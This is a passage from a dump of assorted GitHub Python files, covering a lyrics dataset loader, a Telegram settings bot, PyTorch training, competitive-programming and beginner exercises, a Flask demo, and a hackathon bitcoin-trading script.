self.dataset_id = dataset_id\n self.performance_evaluation_nremovals = performance_evaluation_nremovals\n self.dataset_zip = self.config[\"dataset_zip\"][self.dataset_id]\n self.tokenizer = AutoTokenizer.from_pretrained(self.config[\"model\"])\n self.tokenizer.pad_token = self.tokenizer.eos_token\n self.files_to_delete = [\"(Scriptonite)\", \"BTS\", \"Damso\", \"Genius English Translations\", \"Genius Romanizations\", \"JuL\", \"Nekfeu\", \"Oxxxymiron\"]\n self.files_to_multiartist = [\"50 Cent\", \"Imagine Dragons\", \"Justin Bieber\", \"Taylor Swift\", \"Queen\", \"Lil Peep\", \"Arctic Monkeys\", \"The Notorious B.I.G.\", \"Radiohead\", \"Mac Miller\"]\n self.dataset=\"\"\n self.true_lyrics_dataset=[]\n\n # Obtain selected dataset specific folder\n archive_name=re.sub(r'^.*?/', '',self.dataset_zip)\n archive_name=re.sub(r'.zip','',archive_name)\n self.dataset_dir = archive_name\n print(archive_name)\n\n # Check wether selected database matches downloaded database\n if not os.path.exists(os.path.join(config[\"dataset_path\"],self.dataset_dir)) or not os.listdir(os.path.join(config[\"dataset_path\"],self.dataset_dir)):\n print(os.path.join(self.config[\"base_dir\"], self.dataset_zip))\n with zipfile.ZipFile(os.path.join(self.config[\"base_dir\"], self.dataset_zip), 'r') as zip_ref:\n zip_ref.extractall(os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_id))\n print(\"Successfully extracted the contents of the zip file.\")\n else:\n print(\"The\", os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir), \"folder is not empty. Skipping extraction.\")\n \n if self.dataset_id == 'genius-lyrics':\n # Remove non english authors from dataset \n for file_name in self.files_to_delete:\n file_path = os.path.join(self.config[\"dataset_path\"], self.dataset_dir,f\"{file_name}.csv\")\n if os.path.exists(file_path):\n os.remove(file_path)\n print(f\"Deleted file: {file_path}\")\n else:\n print(f\"File not found: {file_path}\")\n\n def load_dataset_single_artist(self):\n \"\"\"Loads a dataset from a specific artist and stores its cleaned version\"\"\"\n if self.dataset_id == 'genius-lyrics':\n csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir, self.filter_field + \".csv\")\n \n # Check wether performance evaluation needs to be computed\n if(self.performance_evaluation_nremovals):\n csvFile = pd.read_csv(csv_path)\n csvFile = self.__preprocess_lyrics(csvFile)\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n else:\n csvFile = load_dataset(\"csv\", data_files=csv_path, split=\"train\")\n csvFile = csvFile.map(self.__preprocess_lyrics_single_artist)\n self.dataset = csvFile.select_columns(\"lyrics\").train_test_split(test_size=self.config[\"val_size\"])\n\n elif self.dataset_id == '79-musical-genres':\n artists_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/artists-data.csv\")\n lyrics_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/lyrics-data.csv\")\n artistsCsvFile = pd.read_csv(artists_csv_path)\n lyricsCsvFile = pd.read_csv(lyrics_csv_path)\n\n # Merge both databases\n csvFile = lyricsCsvFile.merge(artistsCsvFile[['Artist', 'Genres', 'Popularity', 'Link']], left_on='ALink', right_on='Link', how='inner')\n csvFile = self.__preprocess_lyrics_single_artist(csvFile)\n if self.performance_evaluation_nremovals == None:\n self.dataset = Dataset.from_pandas(csvFile).select_columns(\"Lyric\").train_test_split(test_size=self.config[\"val_size\"])\n else:\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n \n\n def load_dataset_multiple_artists(self):\n \"\"\"Loads several datasets from different artists and stores its cleaned version\"\"\"\n if self.dataset_id == 'genius-lyrics':\n folder_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir)\n csv_files = [filename for filename in os.listdir(folder_path) if filename.endswith(\".csv\")]\n csv_files_to_keep = [filename for filename in csv_files if any(artist in filename for artist in self.files_to_multiartist)]\n print(\"csv_files: \", csv_files)\n print(\"csv_files_to_keep: \", csv_files_to_keep)\n datasets = []\n # Append preprocess selected multiple artists datasets\n for file in csv_files_to_keep:\n print(\"FILE: \", file)\n csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir, file)\n # Check wether performance evaluation needs to be computed\n if(self.performance_evaluation_nremovals):\n csvFile = pd.read_csv(csv_path)\n # csvFile = csvFile.filter(lambda row: row['lyrics'] is not None and row['artist'] is not None)\n csvFile = self.__preprocess_lyrics_multiple_artists(csvFile)\n csvFile = csvFile[csvFile.columns.intersection(['lyrics'])]\n datasets.append(csvFile)\n else:\n csvFile = load_dataset(\"csv\", data_files=csv_path, split=\"train\")\n csvFile = csvFile.filter(lambda row: row['lyrics'] is not None and row['artist'] is not None)\n csvFile = csvFile.map(self.__preprocess_lyrics_multiple_artists)\n csvFile = csvFile.select_columns(\"lyrics\")\n datasets.append(csvFile)\n\n if(self.performance_evaluation_nremovals):\n # Concatenate datasets and store it internally\n csvFile = pd.concat(datasets)\n # shuffle concatenated datasets\n csvFile = csvFile.sample(frac=1)\n csvFile = csvFile.reset_index()\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n else:\n # Concatenate datasets and store it internally\n self.dataset = concatenate_datasets(datasets)\n self.dataset = self.dataset.train_test_split(test_size=self.config[\"val_size\"])\n print(\"combined_dataset: \", self.dataset)\n elif self.dataset_id == '79-musical-genres':\n artists_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/artists-data.csv\")\n lyrics_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/lyrics-data.csv\")\n artistsCsvFile = pd.read_csv(artists_csv_path)\n lyricsCsvFile = pd.read_csv(lyrics_csv_path)\n \n # Merge both databases\n csvFile = lyricsCsvFile.merge(artistsCsvFile[['Artist', 'Genres', 'Popularity', 'Link']], left_on='ALink', right_on='Link', how='inner')\n csvFile = self.__preprocess_lyrics_multiple_artists(csvFile)\n # Modify test dataset in case we want to evaluate performance\n if self.performance_evaluation_nremovals == None:\n self.dataset = Dataset.from_pandas(csvFile).select_columns(\"Lyric\").train_test_split(test_size=self.config[\"val_size\"])\n else:\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n\n def tokenize(self, element):\n \"\"\"Tokenizes a loaded dataset containing a lyrics section\"\"\"\n context_length = 128\n input_batch = []\n\n if self.dataset_id == 'genius-lyrics':\n outputs = self.tokenizer(\n element[\"lyrics\"],\n truncation=True,\n max_length=context_length,\n #padding=\"max_length\",\n return_overflowing_tokens=True,\n return_length=True,\n )\n elif self.dataset_id == '79-musical-genres':\n outputs = self.tokenizer(\n element[\"Lyric\"],\n truncation=True,\n max_length=context_length,\n #padding=\"max_length\",\n return_overflowing_tokens=True,\n return_length=True,\n )\n\n for length, input_ids in zip(outputs[\"length\"], outputs[\"input_ids\"]):\n input_batch.append(input_ids)\n return {\"input_ids\": input_batch}\n \n def __preprocess_lyrics_single_artist(self, data):\n \"\"\"Preprocesses lyrics by removing first line and text between square brakets\"\"\"\n if self.dataset_id == 'genius-lyrics':\n # Remove the first line\n if data['lyrics'] is not None:\n data['lyrics'] = data['lyrics'].split('\\n', 1)[-1]\n \n # Remove text between square brackets\n data['lyrics'] = re.sub(r'\\[.*?\\]', '', data['lyrics'])\n data['lyrics'] = data['lyrics'].strip()\n data['lyrics'] = re.sub(r'[-+]?(\\d+).(\\d+)KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+)KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+).(\\d+)Embed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+)Embed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'Embed', '', data['lyrics'])\n else:\n data['lyrics'] = \"\"\n\n elif self.dataset_id == '79-musical-genres':\n # Select only english songs\n data = data[data['language']=='en']\n\n # Apply genre filter\n if(self.filter_field):\n data = data[data['Artist'].str.contains(self.filter_field, case=False, na=False)]\n data = data.reset_index()\n\n \n '''split_data = [j.split() for j in data['Lyric'].split('\\n')]\n split_data = list(filter(None, split_data))\n data['Lyric'] = '\\n'.join(' '.join(v) for v in split_data)'''\n data['Lyric'] = data['Lyric'].apply(lambda x: re.sub(r'\\[.*?\\]', '', x))\n data['Lyric'] = data['Lyric'].apply(lambda x: re.sub(r'\\(.*?\\)', '', x))\n \n data = data.drop(columns=['ALink','SLink','Link','Popularity'])\n\n return data\n \n def __preprocess_lyrics(self, data):\n \"\"\"Preprocesses lyrics by removing first line and text between square brakets\"\"\"\n if self.dataset_id == 'genius-lyrics':\n for i in range(len(data['lyrics'])):\n if isinstance(data['lyrics'][i], str):\n # Remove the first line\n data['lyrics'][i] = data['lyrics'][i].split('\\n', 1)[-1]\n \n # Remove text between square brackets\n data['lyrics'][i] = re.sub(r'\\[.*?\\]', '', data['lyrics'][i])\n data['lyrics'][i] = data['lyrics'][i].strip()\n\n # Remove double break lines\n split_data = [j.split() for j in data['lyrics'][i].split('\\n')]\n split_data = list(filter(None, split_data))\n data['lyrics'][i] = '\\n'.join(' '.join(v) for v in split_data)\n\n # Remove last word from lyrics i.e. 1.6KEmbed?\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+).(\\d+)KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+)KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+).(\\d+)Embed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+)Embed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'Embed', '', data['lyrics'][i])\n else:\n data['lyrics'][i] = \"\"\n elif self.dataset_id == '79-musical-genres':\n pass\n\n return data\n\n def __preprocess_lyrics_multiple_artists(self, data):\n \"\"\"Preprocesses multiple artists lyrics\"\"\"\n if self.dataset_id == 'genius-lyrics':\n if self.performance_evaluation_nremovals:\n data = self.__preprocess_lyrics(data)\n else:\n data = self.__preprocess_lyrics_single_artist(data)\n data['lyrics'] = data['artist'] + \": \" + data['lyrics']\n elif self.dataset_id == '79-musical-genres':\n # Select only english songs\n data = data[data['language']=='en']\n\n # Apply genre filter\n if(self.filter_field == 'multipleArtists'):\n data = data[data['Artist'].str.contains(self.filter_field, case=False, na=False)]\n elif(self.filter_field):\n data = data[(data['Genres'].isin([self.filter_field])) & (data['Popularity']>5)]\n data = data.reset_index()\n\n # Remove double break lines\n for i in range(len(data['Lyric'])):\n split_data = [j.split() for j in data['Lyric'][i].split('\\n')]\n split_data = list(filter(None, split_data))\n data['Lyric'][i] = '\\n'.join(' '.join(v) for v in split_data)\n \n data = data.drop(columns=['ALink','SLink','Link','Popularity'])\n\n return data\n\n def __split_train_custom_eval(self, csvFile, test_size):\n \"\"\"Custom train - eval set split\"\"\"\n n_train = math.ceil((1.0 - test_size) * len(csvFile))\n n_test = math.ceil(test_size * len(csvFile))\n n_train, n_test = int(n_train), int(n_test)\n print(\"n_train: \", n_train, \" n_test: \", n_test)\n test_set = csvFile.sample(n = n_test)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n train_set = train_set.reset_index()\n\n # remove last n verses from test set\n test_set = test_set.reset_index()\n if(self.dataset_id=='genius-lyrics'):\n #test_set['lyrics'] = self.__remove_last_verses_from_dataset(test_set['lyrics'], test_set['lyrics'], n=self.performance_evaluation_nremovals)\n test_set['lyrics'] = self.__remove_last_words_from_dataset(test_set['lyrics'], test_set['lyrics'], n=self.performance_evaluation_nremovals)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n # Create datasets\n train_dataset = Dataset.from_pandas(train_set).select_columns(\"lyrics\")\n test_dataset = Dataset.from_pandas(test_set).select_columns(\"lyrics\")\n elif(self.dataset_id=='79-musical-genres'):\n #test_set['Lyric'] = self.__remove_last_verses_from_dataset(test_set['Lyric'], test_set['Lyric'], n=self.performance_evaluation_nremovals)\n test_set['Lyric'] = self.__remove_last_words_from_dataset(test_set['Lyric'], test_set['Lyric'], n=self.performance_evaluation_nremovals)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n train_dataset = Dataset.from_pandas(train_set).select_columns(\"Lyric\")\n test_dataset = Dataset.from_pandas(test_set).select_columns(\"Lyric\")\n \n # Concatenating train_dataset and test_dataset\n dataset=DatasetDict({'train': train_dataset, 'test': test_dataset})\n\n return dataset\n \n def __remove_last_verses_from_dataset(self, dataset_candidate, dataset_reference, n):\n \"\"\"Deletes last n verses from specified dataset\"\"\"\n split_true_lyrics_dataset = []\n for i in range(len(dataset_candidate)):\n # Remove last n sentences\n split_dataset = dataset_candidate[i].split('\\n')\n split_true_lyrics_dataset = dataset_reference[i].split('\\n')\n for j in range(0, n):\n split_dataset.pop()\n for j in range(0, len(split_true_lyrics_dataset)-n):\n split_true_lyrics_dataset.pop(0)\n # Join datasets\n self.true_lyrics_dataset.append('\\n'.join(split_true_lyrics_dataset))\n dataset_candidate[i] = '\\n'.join(split_dataset)\n return dataset_candidate\n\n def __remove_last_words_from_dataset(self, dataset_candidate, dataset_reference, n):\n \"\"\"Deletes last n words from specified dataset\"\"\"\n split_true_lyrics_dataset = []\n for i in range(len(dataset_candidate)):\n # Remove last n words\n split_dataset = [j.split() for j in dataset_candidate[i].split('\\n')]\n split_true_lyrics_dataset = [j.split() for j in dataset_reference[i].split('\\n')]\n word_count=0\n for j in reversed(range(0,len(split_dataset))):\n if split_dataset[j] != '[]':\n for k in reversed(range(len(split_dataset[j]))):\n if word_count >= n:\n split_true_lyrics_dataset[j].pop(k)\n else:\n #print(\"removed word count: \", word_count, \" removed word: \", split_dataset[j][k])\n split_dataset[j].pop(k)\n word_count+=1\n else:\n continue\n if(word_count != n):\n print('Only removed ' + str(word_count) + ' words from data')\n print('test set reference ' + i + ' length was: ' + str(dataset_reference[i]) + '...')\n # Join datasets\n split_dataset = list(filter(None, split_dataset))\n split_true_lyrics_dataset = list(filter(None, split_true_lyrics_dataset))\n self.true_lyrics_dataset.append('\\n'.join(' '.join(v) for v in split_true_lyrics_dataset))\n dataset_candidate[i] = '\\n'.join(' '.join(v) for v in split_dataset)\n return dataset_candidate","repo_name":"DanielLosada/Transformers---Lyrics-Generator","sub_path":"gpt2-model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70308159826","text":"import json\nfrom telethon import events, Button\nfrom asyncio import exceptions\nfrom .. import jdbot, chat_id, _botset\nfrom .utils import split_list, logger,press_event\n\n\n@jdbot.on(events.NewMessage(from_users=chat_id, pattern='^/set$'))\nasync def myset(event):\n SENDER = event.sender_id\n try:\n msg = await jdbot.send_message(chat_id,'请稍后,正在查询')\n with open(_botset,'r',encoding='utf-8') as f:\n myset = json.load(f)\n info = '您目前设置如下:\\n'\n for i in myset:\n info = info + f'\\t\\t- {i}-->{myset[i]} \\n'\n info = info + '请点击您要设置的项目,选择后,输入要设置的值,重启生效,垃圾话以 | 进行区隔,黑名单以空格或逗号或顿号区隔'\n btn = [Button.inline(i,i) for i in myset]\n btn.append(Button.inline('取消', data='cancel'))\n btn = split_list(btn,3)\n async with jdbot.conversation(SENDER, timeout=60) as conv:\n msg = await jdbot.edit_message(msg,info,buttons=btn)\n convdata = await conv.wait_event(press_event(SENDER))\n res = bytes.decode(convdata.data)\n if res == 'cancel':\n msg = await jdbot.edit_message(msg, '对话已取消')\n conv.cancel()\n else:\n await jdbot.delete_messages(chat_id,msg)\n msg = await conv.send_message(f'请输入您要修改的{res}\\n如果为True或False首字符大写\\n```{myset[res]}```')\n data = await conv.get_response()\n myset[res] = data.raw_text\n with open(_botset,'w+',encoding='utf-8') as f:\n json.dump(myset,f)\n await jdbot.delete_messages(chat_id,msg)\n await jdbot.send_message(chat_id,'已完成修改,重启后生效')\n except exceptions.TimeoutError:\n msg = await jdbot.edit_message(msg, '选择已超时,对话已停止')\n except Exception as e:\n msg = await jdbot.edit_message(msg, f'something wrong,I\\'m sorry\\n{str(e)}')\n logger.error(f'something wrong,I\\'m sorry\\n{str(e)}')\n","repo_name":"yxj1028530975/jd_scripts-3","sub_path":"jbot/bot/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21377616772","text":"from .simulation import *\r\n\r\nif __name__ == '__main__':\r\n print('*' * 50)\r\n \r\n system = None\r\n if simulation_type == 'BarnesHut':\r\n system = RenderableBarnesHutSystem()\r\n elif simulation_type == 'BruteForce':\r\n system = RenderableBruteForceSystem()\r\n\r\n system.start_the_bodies(int(bodies))\r\n renderer = SystemRenderer(system, frames=int(frames), trail_size=int(trail_size), performance_test=performance_test)\r\n\r\n renderer.run()\r\n\r\n","repo_name":"Naimish240/CrudeBHT","sub_path":"CrudeBHT/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4824674870","text":"from torch.utils.data import DataLoader\n\nimport models\nimport data_handler\nfrom collections import OrderedDict\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\n\n\n\nif __name__ == '__main__':\n\n dataset = data_handler.data_handler('./data/bikes.csv')\n samples_train = int(len(dataset) * 0.8)\n train_set, val_set = torch.utils.data.random_split(dataset, [samples_train, len(dataset) - samples_train])\n\n dataloader_train = DataLoader(dataset=train_set, batch_size=15, drop_last=True, shuffle=True)\n dataloader_test = DataLoader(dataset=val_set, batch_size=5,drop_last=True, shuffle=True)\n\n model = models.MLP_1_hidden(dataset.features, 16, 1)\n\n epochs = 0\n criterion = nn.L1Loss()\n optimizer = optim.Adam(model.parameters(), lr=0.5)\n scheduler = StepLR(optimizer, step_size=100, gamma=0.1)\n loss_anterior = 0\n best_loss = float(np.inf)\n\n while True:\n loss_train=0\n for x_train,y_train in iter(dataloader_train):\n x_train,y_train = x_train.float() ,y_train.float()\n model.train()\n optimizer.zero_grad()\n output = model.forward(x_train)\n loss = criterion(output, y_train)\n loss.backward()\n optimizer.step()\n loss_train += loss.item()\n model.eval()\n with torch.no_grad():\n loss_test = 0\n for x_test, y_test in iter(dataloader_test):\n x_test, y_test = x_test.float(), y_test.float()\n test_output = model.forward(x_test)\n loss_test += criterion(test_output, y_test).item()\n print(f'epoch {epochs + 1} and LR {scheduler.get_last_lr()} done: loss of {loss_train} and loss_test of {loss_test}')\n scheduler.step()\n epochs += 1\n\n\n if loss_train == loss_anterior:\n break\n else:\n loss_anterior = loss_train\n\n if loss_train>= 1\n return i + 1\n\n\ndef solve():\n N = int(rl())\n P = list(map(int, rl().split()))\n \n p_to_idx = [0] * (N + 1)\n for i, x in enumerate(P):\n p_to_idx[x] = i + 1\n \n bit = BinaryIndexedTree(N)\n ans = 0\n for pi in range(N, 0, -1):\n idx = p_to_idx[pi]\n left = bit.sum(idx)\n bit.add(idx, 1)\n right = N - pi - left\n l0 = bit.bisect_left(left - 1) if 2 <= left else 0\n l1 = bit.bisect_left(left) if 1 <= left else 0\n r0 = bit.bisect_left(left + 2) if 1 <= right else N + 1\n r1 = bit.bisect_left(left + 3) if 2 <= right else N + 1\n cnt = 0\n if l1 != 0:\n cnt += (l1 - l0) * (r0 - idx)\n if r0 != 0:\n cnt += (r1 - r0) * (idx - l1)\n ans += pi * cnt\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC140/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5529371565","text":"# 1. **Anagram Check**: Write a Python function that checks whether two given words are anagrams.\n# - *Input*: \"cinema\", \"iceman\"\n# - *Output*: \"True\"\nword1 = \"cinema\"\nword2 = \"iceman\"\ndef anagrams(word1, word2):\n w1=word1.replace(\" \",\"\").lower()\n w2=word2.replace(\" \",\"\").lower()\n return sorted(w1)==sorted(w2)\n\nprint(anagrams(word1, word2))\n\n# 2. **Bubble Sort**: Implement the bubble sort algorithm in Python.\n# - *Input*: [64, 34, 25, 12, 22, 11, 90]\n# - *Output*: \"[11, 12, 22, 25, 34, 64, 90]\"\narr=[64, 34, 25, 12, 22, 11, 90]\ndef bubblesort(arr):\n n=len(arr)\n for i in range(n):\n for j in range(0,n-i-1):\n if arr[j]>arr[j+1]:\n arr[j],arr[j+1]=arr[j+1],arr[j]\n\n\nbubblesort(arr)\nprint(arr)\n\n# 3. **Longest Common Prefix**: Given a list of strings, find the longest common prefix.\n# - *Input*: [\"flower\",\"flow\",\"flight\"]\n# - *Output*: \"fl\"\n\nword= [\"flower\",\"flow\",\"flight\"]\ndef comprefix(word):\n prefix=\"\"\n if not word:\n return \"\"\n word.sort()\n for i in range(len(word[0])):\n if word[0][i]==word[-1][i]:\n prefix+=word[0][i]\n else:\n break\n return prefix\n\n\nprint(comprefix(word))\n\n# 4. **String Permutations**: Write a Python function to calculate all permutations of a given string.\n# - *Input*: \"abc\"\n# - *Output*: \"['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\"\n\nfrom itertools import permutations\n\ndef string_permutations(input_string):\n # Generate all permutations of the input string\n perms = permutations(input_string)\n \n # Convert permutations to a list of strings\n result = [''.join(permutation) for permutation in perms]\n \n return result\n\n# Input string\ninput_string = \"abc\"\n\n# Get permutations and print the output\npermutations_list = string_permutations(input_string)\nprint(permutations_list) # Output: ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\n","repo_name":"kkalyankumar9/GenAi_Projects","sub_path":"PythonGENAI/Day1/L2/set4.py","file_name":"set4.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24795614160","text":"# return语句表示一个函数的结束\ndef test(a, b):\n x = a // b\n y = a % b\n return x, y\n # return [x,y]\n # return {'x':x,'y':y}\n\n\n# 一般情况下,一个函数最多只会执行一个return语句\n# 特殊情况(finally语句)下,一个函数可能会执行多个return语句\n\nresult = test(13, 5)\nprint('商是{},余数是{}'.format(result[0], result[1]))\n# print('商是{},余数是{}'.format(result['x'], result['y']))\n\n# 也可以对参数进行拆包\nshang, yushu = test(16, 3)\nprint('商是{},余数是{}'.format(shang, yushu))\n","repo_name":"weizt/python_studying","sub_path":"函数/07-函数的多个返回值.py","file_name":"07-函数的多个返回值.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17326293788","text":"import json\n\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\n''' \nParticipate in a data pipeline here '''\n@app.route(\"/get\")\ndef get():\n try:\n response_data = {\n \"message\": \"Hello world from Cratus!\"}\n return app.response_class(\n response=json.dumps(response_data),\n status=200,\n mimetype='application/json')\n except Exception as e:\n print(e)\n\n''' \nServe Interactive container frontends and Analytics Dashboards here.'''\n@app.route('/')\ndef root():\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(debug=False, host='0.0.0.0', port=8080)\n","repo_name":"cratus-tech-tutorials/Asset-Rx-Edge-Container-Tutorial","sub_path":"head-node-tutorial/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26690891324","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('allmanga', views.show_allmanga),\n # path('mangafilter', views.MangaFilterView),\n path('singlemanga/', views.singlemanga, name='singlecomic'),\n path('search', views.search_titles),\n path('likes', views.like_comic)\n]\n\n","repo_name":"pSaurav10/MangaGeek","sub_path":"Assignment/comic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44016506214","text":"\"\"\"\nYou are keeping the scores for a baseball game with strange rules. At the beginning of the game, you start with an empty record.\n\nYou are given a list of strings operations, where operations[i] is the ith operation you must apply to the record and is one of the following:\n\nAn integer x.\nRecord a new score of x.\n'+'.\nRecord a new score that is the sum of the previous two scores.\n'D'.\nRecord a new score that is the double of the previous score.\n'C'.\nInvalidate the previous score, removing it from the record.\nReturn the sum of all the scores on the record after applying all the operations.\n\nThe test cases are generated such that the answer and all intermediate calculations fit in a 32-bit integer and that all operations are valid.\n\"\"\"\n\ndef calPoints(operations):\n# intialize a stack to house the score values\n score_stack = []\n # initialize a variable to track the total sum in the stack\n total = 0\n # iterate through the list\n for operation in operations:\n if operation == \"+\":\n # if the char is \"+\" add the previous two from the score stack, push the sum to the top of the score stack\n last_el = score_stack[-1]\n second_last_el = score_stack[-2]\n score_stack.append(last_el + second_last_el)\n total += (last_el + second_last_el)\n elif operation == \"D\":\n # if the char is \"D\" get the most recent value added to the score stack, double it and push it to the top of the stack\n last_el = score_stack[-1]\n score_stack.append(last_el * 2)\n total += (last_el * 2)\n elif operation == \"C\":\n # if the char is \"C\" remove the previous score added to the score stack\n last_el = score_stack.pop()\n total -= last_el\n else:\n # everything else we can assume is an int and push the value as an integer to the score stack\n score_stack.append(int(operation))\n total += int(operation)\n\n # return the total sum of the stack\n return total\n\nprint(calPoints([\"5\",\"2\",\"C\",\"D\",\"+\"])) # 30\nprint(calPoints([\"5\",\"-2\",\"4\",\"C\",\"D\",\"9\",\"+\",\"+\"])) # 27\nprint(calPoints([\"1\",\"C\"])) # 0\n","repo_name":"NickArakaki/ds-a-practice","sub_path":"LeetCode/Completed/Arrays/682.BaseballGame.py","file_name":"682.BaseballGame.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13913668474","text":"def register(username, license_plate_number, registered_users):\n if username in registered_users.keys() and registered_users[username] is not None:\n print(f\"ERROR: already registered with plate number {registered_users[username]}\")\n else:\n registered_users[username] = license_plate_number\n print(f\"{username} registered {license_plate_number} successfully\")\n\n return registered_users\n\n\ndef unregister(username, registered_users):\n if username not in registered_users:\n print(f\"ERROR: user {username} not found\")\n else:\n registered_users.pop(username)\n print(f\"{username} unregistered successfully\")\n\n return registered_users\n\n\nnumber_of_commands = int(input())\n\nparking_users = {}\n\nfor _ in range(number_of_commands):\n command = input().split()\n\n if command[0] == 'unregister':\n operation = command[0]\n name = command[1]\n else:\n operation = command[0]\n name = command[1]\n plate_number = command[2]\n\n if operation == 'register':\n parking_users = register(name, plate_number, parking_users)\n else:\n parking_users = unregister(name, parking_users)\n\n\nfor name, license_plate in parking_users.items():\n print(f\"{name} => {license_plate}\")","repo_name":"dmtr26666/python_softuni","sub_path":"programming_fundamentals_2023/07 - dictionaries/exercises/softuni_parking.py","file_name":"softuni_parking.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6555178708","text":"#!/usr/bin/python3\n''' Module:\n add two integers\n'''\n\n\ndef add_integer(a, b=98):\n '''Return the sum of two integers\n '''\n if type(a) is not int and type(a) is not float:\n raise TypeError(\"a must be an integer\")\n if type(b) is not int and type(b) is not float:\n raise TypeError(\"b must be an integer\")\n a = int(a)\n b = int(b)\n return a + b\n","repo_name":"AhlemKaabi/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21036702247","text":"import json\nimport requests\nimport urllib\nimport re\n\nT = 50\n\n\ndef findBuy(L):\n \"\"\"this function finds the minumum point, which tells us\n we should buy\"\"\"\n # L: list of 30 elements\n return L.index(min(L))\n\n\ndef findSell(L):\n \"\"\" finds the maximum point, where we should sell\"\"\"\n return L.index(max(L))\n\n\ndef buyBitcoin(x):\n x = float(x)\n x = str(x)\n data = 'BUY ' + x + ' BTC jmf784hkuhkufsd'\n info = requests.post('http://lauzhack.sqpub.ch', data=data)\n print(data)\n\n\n\ndef sellBitcoin(x):\n x = float(x)\n x = str(x)\n data = 'SELL ' + x + ' BTC jmf784hkuhkufsd'\n info = requests.post('http://lauzhack.sqpub.ch', data=data)\n print(data)\n\n\ndef streamData():\n r = requests.get(\"http://lauzhack.sqpub.ch/prices\", stream=True)\n\n for chunk in r.iter_content(chunk_size=1024):\n t = 0\n chunk = str(chunk)\n for x in chunk:\n if x <= ' ':\n break\n t = t + 1\n i = t + 1\n for i in range(len(chunk)):\n if chunk[i] > '9' or chunk[i] < '0' or chunk[i] != '.':\n break\n i = i + 1\n val = float(chunk[t + 1:i])\n print(val)\n\n\ndef popLowest(L_L,A):\n i = A.index(min(A))\n print(i)\n L_L.pop(2*i)\n L_L.pop(2*i)\n A.pop(i)\n A.append(0)\n\ndef choose(L, L_L):\n var = float(\"inf\")\n closest = 0\n i=0\n for i in range(int(len(L_L)/2)):\n s = 0\n for k in range(T):\n s += abs(L[k] - L_L[2*i][k])\n if (s < var):\n closest = i\n var = s\n return 2*i + 